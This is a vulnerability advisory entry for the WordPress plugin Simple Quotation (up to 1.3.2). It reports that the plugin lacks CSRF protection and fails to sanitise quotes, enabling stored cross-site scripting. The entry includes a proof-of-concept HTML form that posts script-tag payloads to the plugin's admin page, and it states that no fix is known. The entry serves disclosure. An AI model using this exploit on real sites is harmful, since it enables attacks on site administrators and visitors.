WordPress Plugin Vulnerabilities

Simple Quotation <= 1.3.2 - Quote Creation/Edition via CSRF to Stored Cross-Site Scripting

Description

The plugin does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=simple-quotation/simple-quotation.php" method="POST">
      <input type="hidden" name="author" value="<script>alert(/XSS-image/)</script>" />
      <input type="hidden" name="newquotes" value="<script>alert(/XSS-quote/)</script>" />
      <input type="hidden" name="add" value="Add the quote" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

References

Classification

Miscellaneous

Original Researcher
Abhishek Bhoir
Submitter
Abhishek Bhoir
Verified
Yes

Timeline

Publicly Published
2022-02-16 (about 2 years ago)
Added
2022-02-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other